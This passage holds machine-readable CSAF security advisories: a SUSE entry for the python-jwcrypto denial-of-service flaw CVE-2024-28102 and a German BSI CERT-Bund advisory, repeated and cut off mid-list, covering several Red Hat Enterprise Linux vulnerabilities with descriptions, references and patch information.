{
"category": "product_version",
"name": "python311-jwcrypto-1.5.6-2.1.x86_64",
"product": {
"name": "python311-jwcrypto-1.5.6-2.1.x86_64",
"product_id": "python311-jwcrypto-1.5.6-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "python312-jwcrypto-1.5.6-2.1.x86_64",
"product": {
"name": "python312-jwcrypto-1.5.6-2.1.x86_64",
"product_id": "python312-jwcrypto-1.5.6-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "python39-jwcrypto-1.5.6-2.1.x86_64",
"product": {
"name": "python39-jwcrypto-1.5.6-2.1.x86_64",
"product_id": "python39-jwcrypto-1.5.6-2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python310-jwcrypto-1.5.6-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.aarch64"
},
"product_reference": "python310-jwcrypto-1.5.6-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python310-jwcrypto-1.5.6-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.ppc64le"
},
"product_reference": "python310-jwcrypto-1.5.6-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python310-jwcrypto-1.5.6-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.s390x"
},
"product_reference": "python310-jwcrypto-1.5.6-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python310-jwcrypto-1.5.6-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.x86_64"
},
"product_reference": "python310-jwcrypto-1.5.6-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-jwcrypto-1.5.6-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.aarch64"
},
"product_reference": "python311-jwcrypto-1.5.6-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-jwcrypto-1.5.6-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.ppc64le"
},
"product_reference": "python311-jwcrypto-1.5.6-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-jwcrypto-1.5.6-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.s390x"
},
"product_reference": "python311-jwcrypto-1.5.6-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-jwcrypto-1.5.6-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.x86_64"
},
"product_reference": "python311-jwcrypto-1.5.6-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-jwcrypto-1.5.6-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.aarch64"
},
"product_reference": "python312-jwcrypto-1.5.6-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-jwcrypto-1.5.6-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.ppc64le"
},
"product_reference": "python312-jwcrypto-1.5.6-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-jwcrypto-1.5.6-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.s390x"
},
"product_reference": "python312-jwcrypto-1.5.6-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-jwcrypto-1.5.6-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.x86_64"
},
"product_reference": "python312-jwcrypto-1.5.6-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python39-jwcrypto-1.5.6-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.aarch64"
},
"product_reference": "python39-jwcrypto-1.5.6-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python39-jwcrypto-1.5.6-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.ppc64le"
},
"product_reference": "python39-jwcrypto-1.5.6-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python39-jwcrypto-1.5.6-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.s390x"
},
"product_reference": "python39-jwcrypto-1.5.6-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python39-jwcrypto-1.5.6-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.x86_64"
},
"product_reference": "python39-jwcrypto-1.5.6-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-28102",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-28102"
}
],
"notes": [
{
"category": "general",
"text": "JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-28102",
"url": "https://www.suse.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "SUSE Bug 1221230 for CVE-2024-28102",
"url": "https://bugzilla.suse.com/1221230"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-06-15T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-28102"
}
]
}
wid-sec-w-2024-1003
Vulnerability from csaf_certbund
Notes
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Red Hat Enterprise Linux (RHEL) ist eine popul\u00e4re Linux-Distribution.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in Red Hat Enterprise Linux ausnutzen, um einen Denial-of-Service-Zustand herbeizuf\u00fchren, beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, Cross-Site Scripting (XSS)-Angriffe durchzuf\u00fchren oder einen Men-in-the-Middle-Angriff auszuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2024-1003 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-1003.json"
},
{
"category": "self",
"summary": "WID-SEC-2024-1003 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1003"
},
{
"category": "external",
"summary": "RedHat Security Advisory vom 2024-05-01",
"url": "https://access.redhat.com/errata/RHSA-2024:2119"
},
{
"category": "external",
"summary": "RedHat Security Advisory vom 2024-05-01",
"url": "https://access.redhat.com/errata/RHSA-2024:2132"
},
{
"category": "external",
"summary": "RedHat Security Advisory vom 2024-05-01",
"url": "https://access.redhat.com/errata/RHSA-2024:2437"
},
{
"category": "external",
"summary": "RedHat Security Advisory vom 2024-05-01",
"url": "https://access.redhat.com/errata/RHSA-2024:2559"
},
{
"category": "external",
"summary": "RedHat Security Advisory vom 2024-05-01",
"url": "https://access.redhat.com/errata/"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-2559 vom 2024-05-07",
"url": "https://linux.oracle.com/errata/ELSA-2024-2559.html"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-2566 vom 2024-05-09",
"url": "https://linux.oracle.com/errata/ELSA-2024-2566.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2988 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:2988"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2968 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:2968"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2961 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:2961"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2952 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:2952"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3102 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:3102"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2987 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:2987"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3267 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3264 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:3264"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3321 vom 2024-05-23",
"url": "https://access.redhat.com/errata/RHSA-2024:3321"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3322 vom 2024-05-23",
"url": "https://access.redhat.com/errata/RHSA-2024:3322"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3323 vom 2024-05-23",
"url": "https://access.redhat.com/errata/RHSA-2024:3323"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3324 vom 2024-05-23",
"url": "https://access.redhat.com/errata/RHSA-2024:3324"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3325 vom 2024-05-23",
"url": "https://access.redhat.com/errata/RHSA-2024:3325"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-2987 vom 2024-05-28",
"url": "https://linux.oracle.com/errata/ELSA-2024-2987.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3392 vom 2024-05-28",
"url": "https://access.redhat.com/errata/RHSA-2024:3392"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-2961 vom 2024-05-28",
"url": "https://linux.oracle.com/errata/ELSA-2024-2961.html"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-3264 vom 2024-05-30",
"url": "http://linux.oracle.com/errata/ELSA-2024-3264.html"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-3267 vom 2024-06-01",
"url": "https://linux.oracle.com/errata/ELSA-2024-3267.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:4522 vom 2024-07-12",
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2024:3976-1 vom 2024-11-12",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2024-November/019809.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:11189 vom 2024-12-17",
"url": "https://access.redhat.com/errata/RHSA-2024:11189"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:11238 vom 2024-12-17",
"url": "https://access.redhat.com/errata/RHSA-2024:11238"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-11238 vom 2024-12-19",
"url": "https://linux.oracle.com/errata/ELSA-2024-11238.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:0078 vom 2025-01-08",
"url": "https://access.redhat.com/errata/RHSA-2025:0078"
}
],
"source_lang": "en-US",
"title": "Red Hat Enterprise Linux: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-01-07T23:00:00.000+00:00",
"generator": {
"date": "2025-01-08T10:42:29.202+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.10"
}
},
"id": "WID-SEC-W-2024-1003",
"initial_release_date": "2024-05-01T22:00:00.000+00:00",
"revision_history": [
{
"date": "2024-05-01T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2024-05-07T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2024-05-09T22:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2024-05-21T22:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-05-22T22:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-05-28T22:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Oracle Linux und Red Hat aufgenommen"
},
{
"date": "2024-05-30T22:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2024-06-02T22:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2024-07-11T22:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-11-11T23:00:00.000+00:00",
"number": "10",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2024-12-16T23:00:00.000+00:00",
"number": "11",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-12-19T23:00:00.000+00:00",
"number": "12",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2025-01-07T23:00:00.000+00:00",
"number": "13",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "13"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Oracle Linux",
"product": {
"name": "Oracle Linux",
"product_id": "T004914",
"product_identification_helper": {
"cpe": "cpe:/o:oracle:linux:-"
}
}
}
],
"category": "vendor",
"name": "Oracle"
},
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"category": "product_version_range",
"name": "\u003c9",
"product": {
"name": "Red Hat Enterprise Linux \u003c9",
"product_id": "T030284"
}
},
{
"category": "product_version",
"name": "9",
"product": {
"name": "Red Hat Enterprise Linux 9",
"product_id": "T030284-fixed",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:9"
}
}
}
],
"category": "product_name",
"name": "Enterprise Linux"
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-45803",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in Red Hat Enterprise Linux. Diese Fehler bestehen in den Komponenten urllib3 und python-jwcrypto aufgrund einer fehlenden Bereinigung des HTTP-Anfragek\u00f6rpers und eines unkontrollierten Ressourcenverbrauchs. Ein benachbarter oder entfernter, authentifizierter Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu verursachen oder vertrauliche Informationen offenzulegen."
}
],
"product_status": {
"known_affected": [
"T002207",
"67646",
"T004914",
"T030284"
]
},
"release_date": "2024-05-01T22:00:00.000+00:00",
"title": "CVE-2023-45803"
},
{
"cve": "CVE-2024-28102",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in Red Hat Enterprise Linux. Diese Fehler bestehen in den Komponenten urllib3 und python-jwcrypto aufgrund einer fehlenden Bereinigung des HTTP-Anfragek\u00f6rpers und eines unkontrollierten Ressourcenverbrauchs. Ein benachbarter oder entfernter, authentifizierter Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu verursachen oder vertrauliche Informationen offenzulegen."
}
],
"product_status": {
"known_affected": [
"T002207",
"67646",
"T004914",
"T030284"
]
},
"release_date": "2024-05-01T22:00:00.000+00:00",
"title": "CVE-2024-28102"
},
{
"cve": "CVE-2023-52323",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in Red Hat Enterprise Linux. Diese Fehler bestehen in den Komponenten pycryptodomex, Jinja2 und PCP aufgrund eines Lecks in einem Seitenkanal, einer unsachgem\u00e4\u00dfen Eingabevalidierung und der Offenlegung des Redis-Servers. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Cross-Site Scripting (XSS)-Angriffe durchzuf\u00fchren oder vertrauliche Informationen offenzulegen. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T002207",
"67646",
"T004914",
"T030284"
]
},
"release_date": "2024-05-01T22:00:00.000+00:00",
"title": "CVE-2023-52323"
},
{
"cve": "CVE-2024-22195",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in Red Hat Enterprise Linux. Diese Fehler bestehen in den Komponenten pycryptodomex, Jinja2 und PCP aufgrund eines Lecks in einem Seitenkanal, einer unsachgem\u00e4\u00dfen Eingabevalidierung und der Offenlegung des Redis-Servers. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Cross-Site Scripting (XSS)-Angriffe durchzuf\u00fchren oder vertrauliche Informationen offenzulegen. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T002207",
"67646",
"T004914",
"T030284"
]
},
"release_date": "2024-05-01T22:00:00.000+00:00",
"title": "CVE-2024-22195"
},
{
"cve": "CVE-2024-3019",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in Red Hat Enterprise Linux. Diese Fehler bestehen in den Komponenten pycryptodomex, Jinja2 und PCP aufgrund eines Lecks in einem Seitenkanal, einer unsachgem\u00e4\u00dfen Eingabevalidierung und der Offenlegung des Redis-Servers. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Cross-Site Scripting (XSS)-Angriffe durchzuf\u00fchren oder vertrauliche Informationen offenzulegen. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T002207",
"67646",
"T004914",
"T030284"
]
},
"release_date": "2024-05-01T22:00:00.000+00:00",
"title": "CVE-2024-3019"
},
{
"cve": "CVE-2023-45897",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in Red Hat Enterprise Linux. Diese Fehler bestehen in den Komponenten osbuild-composer und Exfatprogs aufgrund einer Race Condition und eines Out-of-Bound-Read-Problems. Ein lokaler Angreifer kann diese Schwachstellen ausnutzen, um einen Man-in-the-Middle-Angriff durchzuf\u00fchren oder um Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T002207",
"67646",
"T004914",
"T030284"
]
},
"release_date": "2024-05-01T22:00:00.000+00:00",
"title": "CVE-2023-45897"
},
{
"cve": "CVE-2024-2307",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in Red Hat Enterprise Linux. Diese Fehler bestehen in den Komponenten osbuild-composer und Exfatprogs aufgrund einer Race Condition und eines Out-of-Bound-Read-Problems. Ein lokaler Angreifer kann diese Schwachstellen ausnutzen, um einen Man-in-the-Middle-Angriff durchzuf\u00fchren oder um Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T002207",
"67646",
"T004914",
"T030284"
]
},
"release_date": "2024-05-01T22:00:00.000+00:00",
"title": "CVE-2024-2307"
}
]
}
WID-SEC-W-2024-1003
Vulnerability from csaf_certbund
Notes
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Red Hat Enterprise Linux (RHEL) ist eine popul\u00e4re Linux-Distribution.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in Red Hat Enterprise Linux ausnutzen, um einen Denial-of-Service-Zustand herbeizuf\u00fchren, beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, Cross-Site Scripting (XSS)-Angriffe durchzuf\u00fchren oder einen Men-in-the-Middle-Angriff auszuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2024-1003 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-1003.json"
},
{
"category": "self",
"summary": "WID-SEC-2024-1003 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1003"
},
{
"category": "external",
"summary": "RedHat Security Advisory vom 2024-05-01",
"url": "https://access.redhat.com/errata/RHSA-2024:2119"
},
{
"category": "external",
"summary": "RedHat Security Advisory vom 2024-05-01",
"url": "https://access.redhat.com/errata/RHSA-2024:2132"
},
{
"category": "external",
"summary": "RedHat Security Advisory vom 2024-05-01",
"url": "https://access.redhat.com/errata/RHSA-2024:2437"
},
{
"category": "external",
"summary": "RedHat Security Advisory vom 2024-05-01",
"url": "https://access.redhat.com/errata/RHSA-2024:2559"
},
{
"category": "external",
"summary": "RedHat Security Advisory vom 2024-05-01",
"url": "https://access.redhat.com/errata/"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-2559 vom 2024-05-07",
"url": "https://linux.oracle.com/errata/ELSA-2024-2559.html"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-2566 vom 2024-05-09",
"url": "https://linux.oracle.com/errata/ELSA-2024-2566.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2988 vom 2024-05-22",
